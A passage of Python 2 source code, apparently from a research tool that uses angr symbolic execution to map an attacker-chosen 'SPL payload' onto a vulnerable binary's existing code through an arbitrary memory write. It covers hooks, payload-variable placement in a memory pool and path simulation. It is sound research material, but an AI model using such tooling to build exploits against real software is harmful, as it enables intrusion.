self.__get_permissions(addr, state) and addr not in _whitelist_:\n            raise Exception(\"Attempted to write to an non-writable address '0x%x'\" % addr)\n            \n\n        # if we are trying to write to an immutable cell, currect execution path must be discarded\n        if self.__sim_mode == SIM_MODE_DISPATCH: \n            if addr in self.__imm:\n\n                oldval = state.se.eval(state.memory.load(addr, size))\n                newval = state.se.eval(state.inspect.mem_write_expr)\n\n                \n                # if the new value is the same with the old one, we're good :)                \n                if oldval != newval:            # if value really changes\n                    self.__disable_hooks = False\n                    \n                    raise Exception(\"Attempted to write to immutable address '0x%x'\" % addr)\n\n\n\n        if state.inspect.mem_write_expr in self.__ext:\n            \n            self.__ext[ state.inspect.mem_write_expr ] = addr\n\n        \n        # if it's not the 1st time that you see this address\n        if not self.__init_mem(state, addr, size):\n\n            # if address is not concretized already and it's in the symbolic variable set\n            if not isinstance(self.__mem[addr], tuple) and addr in self.__sym:\n                symv = self.__sym[ addr ]           # get symbolic variable\n\n                # check whether symbolic variable persists after write\n                if not self.__symv_in(state.inspect.mem_write_expr, symv):\n                    # Variable gets vanished. We should concretize it now, because, after\n                    # that point, memory cell is dead; that is it's not part of the constraints\n                    # anymore, as its original value got lost.\n                    #\n                    # To better illustrate the reason, consider the following code:\n                    #       a = input();\n                    #       if (a > 10 && a < 20) {\n                    #           a = 0;\n                    #           /* target block */\n                    #       }\n                    #\n                    # Here, if we concretize 'a' at the end of the symbolic execution if will\n                    # get a value of 0, which of course is not the desired one. The coorect\n                    # approach, is to concretize, right before it gets overwritten.\n\n\n                    # if variable is part of the constraints, add it to the set\n                    if self.__in_constraints(symv, state):\n                        val = state.se.eval(symv) # self.__mread(state, addr, size))\n                        self.__mem[addr] = (val, size)\n\n                        emph('Address/Value pair found: *0x%x = 0x%x (%d bytes)' % \n                                (addr, val, size), DBG_LVL_2)\n\n                    # if the contents of that cell get lost, we cannot use AWP to write to it\n                    # anymore\n                    #\n                    # TODO: Not sure if this correct\n                    # UPDATE: Immutables should be fine when we write them with the exact same valut\n#                    for i in range(8):\n#                        self.__imm.add(addr + i)\n\n        \n#        print 'AFTER', self.__mread(state, addr, size),  state.inspect.mem_write_expr\n#        self.FOO[ self.__mread(state, addr, size) ]  = ISPO\n\n        # All external inputs (sockets, file descriptors, etc.) should be first written somewhere\n        # in memory / registers eventually, so we can concretize them afterwards   \n\n        self.__disable_hooks = False                # release \"lock\" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_symv_hook(): This callback function is invoked when a new symbolic variable is being\n    #       created.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_symv_hook( self, state ):\n        name = state.inspect.symbolic_name          # get name of the variable\n\n        # we're only interested in symbolic variables that come from external inputs (sockets, \n        # file descriptors, etc.), as register and memory symbolic variables are already been\n        # handled. \n        if not name.startswith('mem_') and not name.startswith('reg_') \\\n            and not name.startswith('x_') and not name.startswith('cond_'):\n            \n            # x  and cond are our variable so they're discarded too\n            dbg_prnt(DBG_LVL_3, \" New symbolic variable '%s'\" % name, pre='[S]')\n\n            self.__ext[ state.inspect.symbolic_expr ] = EXTERNAL_UNINITIALIZED\n\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_reg_wr_hook(): This callback function is invoked when a register is being modified.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_reg_wr_hook( self, state ):    \n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n  \n        # update simulation mode\n#        if self.__blk_start <= state.addr and state.addr < self.__blk_end:\n#            self.__sim_mode = SIM_MODE_FUNCTIONAL\n#        else:\n#            self.__sim_mode = SIM_MODE_DISPATCH\n        if state.inspect.instruction:\n            insn_addr = state.inspect.instruction\n        else:\n            insn_addr = state.addr\n        \n        # get register name (no exceptions here)\n        regnam = state.arch.register_names[ state.inspect.reg_write_offset ]\n        if regnam in HARDWARE_REGISTERS:            # we don't care about all registers (rip, etc.)\n\n            dbg_prnt(DBG_LVL_3, '\\t0x%08x: %s = %s' % \n                        (insn_addr, regnam, state.inspect.reg_write_expr), pre='[r] ')\n\n\n            # if simulation is in dispatch mode, check whether the modified register is immutable\n            if self.__sim_mode == SIM_MODE_DISPATCH:\n\n                # print 'IMM REGS', self.__imm_regs\n                if regnam in self.__imm_regs:\n\n                    # if the new value is the same with the old one, we're good :)\n\n                    # we can concretize them as SPL registers always have integer values\n                    oldval = state.se.eval(self.__getreg(regnam))\n                    newval = state.se.eval(state.inspect.reg_write_expr)\n\n                    # if value really changes (and it has changed in the past)\n                    if oldval != newval and \\\n                        self.__getreg(regnam).shallow_repr() != self.__inireg[regnam].shallow_repr():\n                        self.__disable_hooks = False\n\n                        raise Exception(\"Attempted to write to immutable register '%s'\" % regnam)\n\n                    else:\n                        print \"immutable register '%s' overwritten with same value 0x%x\" % (regnam, newval)\n\n\n            # check whether symbolic variable persists after write\n            if not self.__symv_in(state.inspect.reg_write_expr, self.__inireg[regnam]):\n                if regnam not in self.__reg:        # if register is already concretized, skip it\n                    # concretize register (after this point, its value will get lost)                \n                    val = state.se.eval( self.__getreg(regnam, state) )\n\n\n                    # if register is in the constraints, it should be part of the solution.\n                    # But in any case we need the register to be in __reg, as its value is now\n                    # lost, so we don't want any further register writes to be part of the\n                    # solution.\n\n                    if self.__in_constraints(self.__inireg[regnam], state):\n                        self.__reg[ regnam ] = val\n\n                        emph('Register found: %s = %x' % (regnam, val), DBG_LVL_2)\n                    else:\n                        # make it a tuple to distinguish the 2 cases\n                        self.__reg[ regnam ] = (val,)\n\n\n        self.__disable_hooks = False                # release \"lock\" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __dbg_call_hook(): This callback function is invoked when a function is invoked.\n    #\n    # :Arg state: Current state of the symbolic execution\n    # :Ret: None.\n    #\n    def __dbg_call_hook( self, state ):\n        if self.__disable_hooks:                    # if hooks are disabled, abort\n            return\n\n        # as in __dbg_read_hook(), we need mutual exclusion here as well\n        self.__disable_hooks = True\n\n        address = state.se.eval(state.inspect.function_address)\n        name    = self.__proj.kb.functions[address].name\n\n        # This function is called to solve a difficult problem: Crashes. \n        # TODO: elaborate.\n\n        dbg_prnt(DBG_LVL_3, \"\\tCall to '%s' found.\" % name, pre='[C] ')\n\n        # ---------------------------------------------------------------------\n        # FILE *fopen(const char *path, const char *mode)\n        # ---------------------------------------------------------------------\n        if name == 'fopen':\n            # print 'RDI', state.regs.rdi\n            # print 'RSI', state.regs.rsi\n            \n            # if rdi is an expression then we may need to \n\n            # we work similarly with __mem_RSVPs, but our task here is simpler\n            con_addr = state.se.eval(state.regs.rdi)\n            # print 'ADDR', hex(con_addr)\n\n            if 'W' not in self.__get_permissions(con_addr, state):\n                self.__alloc_un(state, state.regs.rdi)\n                #raise Exception(\"Attempted to write to an non-writable address '0x%x'\" % addr)\n        \n            con_addr = state.se.eval(state.regs.rdi)\n            # print 'ADDR', hex(con_addr)\n\n            name = SYMBOLIC_FILENAME\n          \n\n            # if this address has already been written in the past, any writes will\n            # be overwritten, so discard current path\n            if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                raise Exception(\"Address 0x%x has already been written or it's immutable. \"\n                                \"Discard current path.\" % con_addr)\n\n            # write value byte-by-byte.\n            for i in range(len(name)):\n                self.__mwrite(state, con_addr + i, 1, name[i])\n                self.__imm.add(con_addr + i)\n\n            \n            self.__inivar_rel[ con_addr ] = name\n            self.__mem[ con_addr ] = 0\n            dbg_prnt(DBG_LVL_2, \"Writing call *0x%x = '%s'\" % (con_addr, name))\n\n\n\n        # ---------------------------------------------------------------------\n        # int _IO_getc(_IO_FILE * __fp)\n        #\n        # TODO: Delete this code, or check for uninitialized FILE*\n        # ---------------------------------------------------------------------\n        elif name == '_IO_getc': \n            # print 'RDI', state.regs.rdi\n            error('Oups!')   \n            pass\n\n        # ---------------------------------------------------------------------\n        # TODO: Do the same for others open(), strcmp() (in wuftpd) and so on\n        # ---------------------------------------------------------------------\n\n\n\n        # ---------------------------------------------------------------------\n\n        self.__disable_hooks = False                # release \"lock\" (i.e., enable hooks again)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                         INTERNAL FUNCTIONS - MEMORY MANAGEMENT                          '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_var_values(): Get the values of an SPL variable (there can be >1)\n    #\n    # :Arg variable: The SPL variable\n    # :Ret: The values of that variable.\n    #\n    def __get_var_values( self, variable ):\n        # look for the declaration of \"variable\" (SPL compiler ensures it's uniqueness)\n        for stmt in self.__IR:\n            if stmt['type'] == 'varset' and stmt['name'] == variable:\n                return stmt['val']\n\n        # this should never be executed\n        fatal(\"Searching for non-existing variable '%s'\" % variable)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __pool_RSVP(): Reserve some address space in the pool, to store a variable.\n    #\n    # :Arg variable: The SPL variable\n    # :Ret: The values of that variable.\n    #\n    def __pool_RSVP( self, variable ):        \n        addr = POOLVAR_BASE_ADDR + self.__plsz      # make address pointing to the end of the pool\n        \n\n        self.__relative[ addr ] = '%s + 0x%03x' % (POOLVAR_NAME, self.__plsz)\n\n\n        # reserve some space in the pool to hold variable's values (shift down self.__plsz)\n        # (it's important as recursive calls in __init_variable_rcsv() can overwrite this space)\n        #\n        # NOTE: In current implementation, if there are >1 values, each of them has size 8.\n        #       However we keep the code more general (i.e. independent of SPL compiler) so\n        #       we don't use this observation.\n        self.__plsz += sum(map(lambda v : len(v) if isinstance(v, str) else 8, \n                                self.__get_var_values(variable)))\n\n        return addr                                 # return that address\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_variable_rcsv(): Initialize a single SPL variable. This function writes the value(s)\n    #       for that variable in memory. There are 2 types of variables. *Free* and *Register*.\n    #       Free variables have no restrictions and therefore can be stored at any location (due\n    #       to the AWP). Thus we reserve a \"memory pool\" somewhere in memory and we place all free\n    #       variables there. Register variables are being passed to registers and therefore their\n    #       address must be a valid (+RW) address that is being loaded to a register in a candidate\n    #       block (they are usually on stack / heap).\n    #\n    #       SPL allows variables to get the address of another variable. That is, initializing a\n    #       variable may require to initialize another variable first, and so on. Hence this\n    #       function is recursive. For example consider the following variables (expressed in IR):\n    #       \n    #       {'type':'varset', 'uid':2, 'val':['aaa'],                                 'name':'aaa'}\n    #       {'type':'varset', 'uid':4, 'val':['\\x01\\x00...\\x00', ('aaa',)],           'name':'bbb'}\n    #       {'type':'varset', 'uid':6, 'val':['\\x02\\x00...\\x00', ('aaa',), ('bbb',)], 'name':'ccc'}\n    #       {'type':'varset', 'uid':8, 'val':[('ccc',), '\\x03\\x00...\\x00'],           'name':'ddd'}\n    #\n    #       Here initializing 'ddd', requires to initialize 'ccc' first and to initialize 'ccc' we\n    #       have to initialize 'aaa' and 'bbb', but to initialize 'bbb' we have to also initialize\n    #       'aaa'. The SPL compiler ensures that there not cycles.\n    #\n    # :Arg variable: The variable to initialize\n    # :Ret: The address that the contents of this are stored.\n    #\n    def __init_variable_rcsv( self, variable, depth=0 ):\n        dbg_prnt(DBG_LVL_3, \"Initializing variable '%s' (depth: %d)\" % (variable, depth))\n        \n        # ---------------------------------------------------------------------\n        # Find the address for that variable\n        # ---------------------------------------------------------------------       \n        if variable in self.__vartab:               # register/used variable?\n            addr = self.__vartab[ variable ]        # variable should be placed at a given location\n            \n            if addr in self.__inivar:               # if variable has already been initialized\n                dbg_prnt(DBG_LVL_3, \"'%s' is already initialized.\" % variable)\n                return addr                         # just return it\n\n\n            # addr can be a number, like 0x7ffffffffff01a0 or a string (dereference)\n            # like \"*<BV64 0x7ffffffffff0020>\", or \"*<BV64 rsi_713_64 + 0x18>\".\n            #\n            # If the address gets dereferenced (*X), we store the values into the pool\n            # and write pool's address into X (indirect) at runtime.\n            if isinstance(addr, str):               # is addr a dereference?                \n                addr = self.__pool_RSVP(variable)   # make address pointing to the pool                \n                self.__vartab[ variable ] = addr    # and add it to the vartab\n\n        else:\n            # Variable is not in the vartab => Free. That is, variable can be stored\n            # at any memory location, so we place it on the pool\n            addr = self.__pool_RSVP(variable)\n            self.__vartab[ variable ] = addr\n\n\n        # ---------------------------------------------------------------------\n        # Store the values to that address\n        # ---------------------------------------------------------------------       \n        orig_addr = addr                            # get a backup as address is being modified\n        values    = ''                              # concatenated values\n        relvals   = []                              # values in the relative form\n\n        for val in self.__get_var_values(variable): # for each value\n\n            if isinstance(val, tuple):\n                # Value is a reference to another variable, Recursively initialize the\n                # variable or get its address if it's already initialized. Recursion \n                # always halts, as SPL compiler ensures that variables aren't used before\n                # they initialized so the following cases can't happen:\n                #       int x = {&x};\n                #       int a = {&b}; int b = 10; \n\n                # find the address for that variable and pack it\n                address = self.__init_variable_rcsv( val[0], depth+1 )\n                val     = struct.pack(\"<Q\", address)\n\n                relvals.append( address )           # relative value is an address\n\n            else: \n                relvals.append( val )               # relative value is a string\n\n\n            # at this point, value is a string (SPL compiler 'packs' integers)\n           \n            values += val\n\n    \n        # write value byte-by-byte. Memory address must be immutable;\n        # any writes to it are not allowed\n        for i in range(len(values)):\n            self.__state.memory.store(addr + i, values[i])\n\n            # check if it's already immutable\n            if addr + i in self.__imm:\n                raise Exception('Attempted to write an RSVP to an immutable address')\n\n\n            self.__imm.add(addr + i)\n\n        self.__inivar[ addr ] = values          # mark address as initialized        \n        self.__inivar_rel[ addr ] = relvals     # values in the relative-form \n\n        addr += len(val)                        # and then shift index to the next value\n        print 'INIVAR_REL:', hex(addr), relvals      \n\n        dbg_prnt(DBG_LVL_3, \"Done. '%s' has been initialized at 0x%x\" % (variable, orig_addr))\n\n        return orig_addr                            # return variable's original address\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __init_vars(): Initialize the variables of the SPL payload. This function is essentially a\n    #       wrapper of __init_variable_rcsv().\n    #\n    # :Arg varmap: The current variable mapping\n    # :Ret: None.\n    #\n    def __init_vars( self, varmap ):\n        dbg_prnt(DBG_LVL_2, 'Initializing SPL variables...')\n\n        self.__vartab     = dict(varmap[:])         # create a dictionary out of varmap\n        self.__plsz       = 0                       # our pool size\n        self.__inivar     = { }                     # initialized memory locations \n        self.__inivar_rel = { }                     # values in the relative-form\n\n\n        for var, addr in varmap:                    # for each SPL variable\n            self.__init_variable_rcsv(var)          # recusively store it in memory \n                                                    # and update self.__vartab\n\n        # ---------------------------------------------------------------------\n        # Memory has been initialized. Print out variables (debugging only)\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_2, 'Done. Pool Size: %s. Variable(s) memory layout:' % bold(self.__plsz))\n\n        for addr, val in sorted(self.__inivar.iteritems()):\n            dbg_prnt(DBG_LVL_2, '  %16x <- %s' % (addr, ' '.join(['%02x' % ord(v) for v in val])))\n            \n        # self.__vartab shows the address that each variable has been stored\n        dbg_arb(DBG_LVL_3, 'Variable Table:', \n                                ['%s:0x%x' % (n,v) for n, v in self.__vartab.iteritems()])\n        \n        del self.__inivar                         # we don't need this guy anymore\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mem_RSVPs(): Initialize reserved memory locations that are being used as dereferences.\n    #       This function is the continuation of __init_vars(). The problem here is that the\n    #       address of an RSVP may change during the symbolic execution, or may be unknown until\n    #       we reach the actual statement. For example:\n    #\n    #           UID:8       addr = [rsi + 10]\n    #\n    #       Here, rsi may be set at UID:6, so we don't know the address of [rsi + 10] and hence\n    #       we cannot write a dereference, before we reach statement with UID:8. \n    #\n    #       This function is invoked right before the execution of an accepted block and writes\n    #       any dereferences \"on the fly\". We have to be careful though, as these addresses may\n    #       be already written (we can't use AWP to set them at the beginning of the execution), \n    #       or marked as immutable. In both cases, reservation fails.\n    #\n    #\n    # :Arg state: Current state of the symbolic execution    \n    # :Arg cur_blk: Current basic block address\n    # :Arg cur_uid: Current statement UID\n    # :Ret: If reservation is successful, function returns True. If for some reason reservation \n    #       fails, False is returned.\n    #\n    def __mem_RSVPs( self, state, cur_blk, cur_uid ):\n        dbg_prnt(DBG_LVL_2, \"Applying memory RSVPs ...\")\n\n        # this is a static-style local variable\n        if '_simulate__reserved_syms' not in self.__dict__:\n            self.__reserved_syms = set()            # previous registers that were used in RSVPs\n\n\n        # There's a problem when we concretize a symbolic variable that is already in \n        # __reserved_syms. For instance, if we set <BV64 rsi_713_64 + 0x30> at the 1st \n        # free slot of the pool, then <BV64 rsi_713_64 + 0x10> will point to a used area\n        # in the pool. This memory has already been marked as immutable, so the reservation\n        # will fail. To fix this, we \"shift\" the pool index to avoid these overlaps. Not a\n        # perfect solution, but it works :)\n        #\n        # Although we can use a different memory area for that, we keep everything on the same\n        # pool for simplicity.\n        self.__plsz += POOLVAR_GRANULARITY\n\n    \n        self.__disable_hooks = True                 # disable hooks as we'll write to memory\n\n\n        for blk, rsvp in self.__rsvp.iteritems():   # for each basic block reservation\n\n            # check if it's the right time to do the reservation.\n            #\n            # (IMPORTANT) We can have >1 statements that use the same basic block, but the\n            # current induced subgraph (Hk) might use only one statement from this block. \n            # So, we cannot make the reservations based just on block addresses. We have\n            # to base our decisions on the UIDs as well, but then we can make one reservation\n            # at a time. This is NOT an issue as long as Hk has multiple nodes that correspond\n            # to the same basic block, so we'll have transitions from a block to itself.\n            if blk != cur_blk:\n                continue\n\n            for (uid, addr, sym, val) in rsvp:      # for each statement reservation in this block         \n                if uid != cur_uid:                  # check UID as well\n                   continue\n\n\n                print \"RSVP ADDR',\", addr, val\n\n                \n                reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]\n\n\n\n                self.unchecked_regsets.append( (reg, self.__IR[uid]['val']) )\n\n\n                # If we have a double pointer, load variable's address from vartab (__init_vars() \n                # ensures that __vartab[val[0]] exists and is an valid integer address)                                \n                if addr[0] == '*':                  \n                    addr = addr[1:]                 # drop asterisk\n                    val  = self.__vartab[ val[0] ]\n\n\n\n                for leaf in STR2BV[addr].recursive_leaf_asts:\n                    if leaf.shallow_repr() in SYM2ADDR:\n\n                        print 'ADD contraint', leaf, hex(SYM2ADDR[leaf.shallow_repr() ][0])#, self.__mwrite(state, SYM2ADDR[leaf], 8, leaf)\n                        #self.__state.add_constraints(leaf == self.__mwrite(state, SYM2ADDR[leaf], 8, leaf))\n                        self.FOO.append(leaf)\n                        self.__sym[ SYM2ADDR[leaf.shallow_repr() ][0] ] = leaf\n\n\n                # check if address has dependencies on symbolic registers \n                # (e.g. <BV64 rsi_713_64 + 0x10>).\n                #\n                # Otherwise, address is constant so we directly write to that address.\n                for reg, symreg in sym.iteritems(): # {'rsi': <BV64 rsi_713_64>} pairs\n\n                    # if a register has already been used in a reservation, we don't add more\n                    # constraints as we'll probably make it u n-satisfiable. For example, if\n                    # we have the RSVPs <BV64 rsi_713_64 + 0x10> and <BV64 rsi_713_64 + 0x30>,\n                    # we constrain rsi_713_64 only once.\n\n\n                    if symreg not in self.__reserved_syms:\n                        self.__reserved_syms.add( symreg )\n\n                       # print 'add_constraints', symreg, STR2BV[addr]\n\n                        # UPDATE: We may not need to add constraints. It's possible to already\n                        #   have some constraints with addresses from the allocator, so when\n                        #   we add pool addresses, we make them unsatisfiable. That is, we \n                        #   can implicitly have an address for a reservation outside of the pool.\n                        #   For example:\n                        #\n                        #       <Bool mem_795_64 != 0x0>\n                        #       <Bool (mem_795_64 + 0x10) == 0xd800100f>\n                        #       <Bool mem_795_64 == r13_292906_64>\n                        #\n                        # If we now try to add the following constraint:\n                        #       <Bool (r13_292906_64 + 0x38) == 0xca002028>\n                        # \n                        # we'll make constraints unsatisfiable. Thus we don't have to add the\n                        # last constraint, when has already a single solution\n\n\n\n                        # The symbolic variable in symreg is different from this in state.regs.*.\n                        # To deal with it, we add 2 constraints: 1st, we require that these two\n                        # symbolic variables (symreg and state.regs.*) are equal and 2nd we \n                        # require that the symbolic address will point to an address on the pool.\n                        state.add_constraints(self.__getreg(reg, state) == symreg)\n\n                        state_copy = state.copy()                        \n\n                        # this can be unsatisfiable. Try it on a copy of the state\n                        x = state.se.BVS('x', 64)\n                        \n                        state_copy.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)\n                        state_copy.add_constraints(STR2BV[addr] == x)\n\n\n                        print 'state.satisfiable():', state_copy.satisfiable(), state_copy.se.satisfiable()\n\n                        if not state_copy.satisfiable():\n                            dbg_prnt(DBG_LVL_2, \"Reservation constraint was un-satisfiable. Rolling back...\")\n\n                            del state_copy\n                        else:\n                            # constraint ok. add it to the real state\n                            x = state.se.BVS('x', 64)\n                        \n                            state.add_constraints(x == POOLVAR_BASE_ADDR + self.__plsz)\n                            state.add_constraints(STR2BV[addr] == x)\n\n                            # TODO: comment!\n                            self.__relative[POOLVAR_BASE_ADDR + self.__plsz] = \\\n                                                                '$pool + 0x%03x' % self.__plsz\n\n                            self.__plsz += 8            # update pool\n\n                            del state_copy\n\n\n                # print 'FINAL CONSTRAINTS', state.se.constraints\n\n                try:\n                    # 'addr' is string with a symbolic expression. Convert it back to bitvector\n                    # and concretize it\n                    con_addr = state.se.eval(STR2BV[addr])\n\n                    print 'con_addr', hex(con_addr)\n\n                    # The stack address in the basic block is different from the one in the\n                    # current path. So readjust it (TODO: Do it in a less sloppy way)\n                    # TODO: !!!!!!!\n                    if abs(con_addr - RSP_BASE_ADDR) < 0x1000:\n                        con_addr = (con_addr - RSP_BASE_ADDR) + state.se.eval(state.regs.rsp)\n                        print 'CON', state.regs.rsp, hex(state.se.eval(state.regs.rsp))\n                        print 'CONCON', hex(con_addr)\n                        #  exit()\n\n\n\n                    # -------------------------------------------------------------------------\n                    # RSVPs like this: '<BV64 Reverse(stack_9618_262144[258175:258112]) + 0x18>'\n                    #       get concretized to 0x18, so make sure that before you concretize\n                    #       it's a +W memory\n                    #\n                    # Update: We miss solutions here. Instead of discarding them, initialize them\n                    # somewhere __alloc_un\n                    #\n                    writable = True\n                    in_section = False\n                    try:                    \n                        for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():\n                            if sec.contains_addr(con_addr):\n                                print 'sec.is_writable', sec.is_writable\n                                writable &= sec.is_writable\n                                in_section = True\n                        \n                        if not in_section:\n                            rwx = state.memory.permissions(con_addr)\n                            print 'rwx', rwx\n                            if state.se.eval(rwx) & 2 == 2:\n                                writable = True\n                            else:\n                                writable = False                                \n                    except Exception, e:\n                        writable = False                        \n                    # -------------------------------------------------------------------------\n\n                    if writable == False:\n                        warn(\"RSVP concretized but it has an invalid address '0x%x'\" % con_addr)\n                        # return False\n\n                        # give it a second chance\n                        self.__alloc_un(state, STR2BV[addr])\n                        \n                        con_addr = state.se.eval(STR2BV[addr])\n\n\n                except angr.errors.SimUnsatError:   # un-satisfiable constraints\n                    dbg_prnt(DBG_LVL_2, \"Reservation was un-satisfiable. Discard current path.\")\n                    print 'SSSSS', self.__state.se.constraints\n                    return False                    # reservation failed\n                \n                except Exception, e:\n                    dbg_prnt(DBG_LVL_2, \"Unknown Exception '%s'. Discard current path.\" % str(e))\n                    return False                    # reservation failed\n\n\n                # if this address has already been written in the past, any writes will\n                # be overwritten, so discard current path                \n                #if con_addr in self.__mem or con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                if con_addr in self.__imm or (con_addr + 7) in self.__imm:\n                    dbg_prnt(DBG_LVL_2, \"RSVP 0x%x has already been written or it's immutable. \"\n                                        \"Discard current path.\" % con_addr)\n\n                    return False                    # reservation failed\n\n\n                # write value byte-by-byte. Memory address must also be immutable\n                p_val = struct.pack(\"<Q\", val)\n\n                # print 'WRITING:', hex(val), 'at ', hex(con_addr)\n\n                # this was problematic (endianess was fucked up)\n                # self.__mwrite(state, con_addr, 8, p_val)\n                \n\n                # before you write the value, check if the contents of this address are already\n                # in the contraints\n                symv = self.__mread(state, con_addr, 8)\n                print 'PRIOR VALUE at', hex(con_addr), '::', symv\n                if self.__in_constraints(symv) or [V for V in self.__inireg.values() if V.shallow_repr() == symv.shallow_repr()]:\n                    dbg_prnt(DBG_LVL_2, \"RSVP already in constraints!\")\n                else:\n                    symv = None\n\n\n                for i in range(8):                    \n                    state.memory.store(con_addr + i, p_val[i])\n                    self.__imm.add(con_addr + i)    # mark immutable addresses at byte granularity\n\n\n                # add reservation to memory\n                self.__mem[ con_addr ] = (val, 8)\n\n                dbg_prnt(DBG_LVL_2, \"Writing RSVP *0x%x = 0x%x\" % (con_addr, val))\n\n                if symv != None:\n                    # add the new contraint\n                    state.add_constraints(symv == val)\n\n                    if not state.satisfiable():\n                        dbg_prnt(DBG_LVL_2, \"RSVP caused constraints to be unsatisfiable. Discard Path\")\n                        return False\n\n               # print '$$$$$$$$$$$$$$$$$$$$$$$$$', self.__mread(state, con_addr, 8)\n\n        # print 'FINITO MEM_RSVPz', state.satisfiable(), state.se.satisfiable()\n        # print 'CONSTRAINTS', state.se.constraints\n        \n        self.__disable_hooks = False                # enable hooks again\n\n        return True                                 # reservation was successful\n\n\n\n    # ---------------------------------------------------------------------------------------------\n \n    ''' ======================================================================================= '''\n    '''                          INTERNAL FUNCTIONS - TRACE MANAGEMENT                          '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __simulate_subpath(): This internal function performs the actual symbolic execution, for\n    #       the candidate subpath. It guides symbolic execution through the specific subpath.\n    #\n    # :Arg sublen: The length of the subpath\n    # :Arg subpath: The actual subpath\n    # :Arg mode: The simluation mode for each step\n    # :Ret: If the subpath can be simulated successfully, function returns the new state for the\n    #       symbolic execution. Otherwise, function returns None.\n    #\n    def __simulate_subpath( self, sublen, subpath, mode ):\n        emph(\"Trying subpath (%d): %s\" % (sublen, \n                        ' -> '.join(['0x%x' % p for p in subpath])), DBG_LVL_2)\n   \n \n        self.__disable_hooks = False                # enable hooks\n\n        # Register the signal function handler\n        signal.signal(signal.SIGALRM, self.__sig_handler)\n\n        # clone current state (so we can revert if subpath extension fails)\n        self.stash_context()\n\n        state = self.__state.copy()\n\n        # create hte simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=state)\n        # angr.manager.l.setLevel(logging.ERROR)\n        \n\n        found = simgr.active[0]                     # a.k.a. state\n        \n        dbg_arb(DBG_LVL_3, \"BEFORE Constraints: \", found.se.constraints)\n\n        # guide the symbolic execution: move from basic block to basic block\n        for blk in subpath[1:]:\n            simgr.drop(stash='errored')             # drop errored stashes\n            signal.alarm(SE_TRACE_TIMEOUT)          # define a timeout for the SE engine\n\n\n            self.__sim_mode = mode.pop(0)\n\n            try:\n                dbg_prnt(DBG_LVL_3, \"Next basic block: 0x%x\" % blk)\n                # simgr.explore(find=blk)             # try to move on the next block\n                # simgr.step()\n\n\n                node = ADDR2NODE[found.addr]\n                # print 'NODE ', node, len(node.instruction_addrs)\n\n                num_inst = len(node.instruction_addrs) if node is not None else None\n                if num_inst:\n                    simgr.step(num_inst=num_inst)\n\n                else:\n                    NEW = simgr.step()\n                    # print 'NEW', NEW, NEW.errored\n\n\n            except Exception, msg:                   \n                dbg_prnt(DBG_LVL_3, \"Subpath failed. Exception raised: '%s'\" % bolds(str(msg)))\n                found = None                        # nothing found\n                break                               # abort\n\n            signal.alarm(0)                         # disable alarm\n\n            if not simgr.active:\n                # print 'Stashes', simgr.stashes\n                dbg_arb(DBG_LVL_3, \"Constraints: \", found.se.constraints)\n\n                dbg_prnt(DBG_LVL_3, \"Subpath failed (No 'active' stashes)\")\n                found = None                        # nothing found\n                break                               # abort\n        \n    \n            #print 'Stashes', simgr.stashes\n\n            found = None                     # nothing found\n\n            # print 'Stashes', simgr.stashes            \n            # print 'state.satisfiable():', simgr.active[0].satisfiable()\n\n            # drop any active stashes and make found stashes, active so you\n            # can continue the search           \n            simgr.move(from_stash='active', to_stash='found', \\\n                            filter_func=lambda s: s.addr == blk)\n            \n            simgr.drop(stash='active')\n            simgr.move(from_stash='found', to_stash='active')\n                    \n            \n            if simgr.active:\n                found = simgr.active[0]             # TODO: Shall we use .copy() here?\n\n                dbg_prnt(DBG_LVL_3, \"Block 0x%x found!\" % blk)\n                dbg_arb(DBG_LVL_3, \"Constraints: \", found.se.constraints)\n                \n            # print 'FOUND IS ', found\n            # self.__sim_mode = SIM_MODE_DISPATCH\n            \n\n        if not found:                               # if nothing found, drop cloned state\n            print 'Stashes', simgr.stashes\n\n            self.unstash_context()\n            del state\n        else:            \n            self.drop_context_stash()\n            dbg_prnt(DBG_LVL_3, \"Subpath simulated successfully!\")\n\n        signal.alarm(0)                             # disable alarm\n\n        self.__disable_hooks = True                 # hooks should be disabled        \n\n        return found                                # return state (if any)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. Create and initialize a blank state and prepare the\n    #       environment for the symbolic execution.\n    #\n    # :Arg project: Instance of angr project\n    # :Arg cfg: Binary's CFG\n    # :Arg clobbering: Dictionary of clobbering blocks\n    # :Arg adj: The SPL adjacency list\n    # :Arg IR: SPL's Intermediate Representation (IR)\n    # :Arg varmap: The register mapping\n    # :Arg regmap: The variable mapping\n    # :Arg rsvp: The reserved memory addresses for variables\n    # :Arg entry: Payload's entry point\n    #\n    def __init__( self, project, cfg, clobbering, adj, IR, regmap, varmap, rsvp, entry ):\n        self.__proj = project                       # store arguments internally\n        self.__cfg  = cfg\n        self.__IR   = IR\n        self.__rsvp = rsvp\n        self.__regmap = regmap\n\n        self.__imm    = set()                       # immutable addresses\n        self.__sym    = { }                         # symbolic variables\n        self.__inireg = { }                         # initial register symbolic variables\n\n        self.__reg = { }                            # final output for 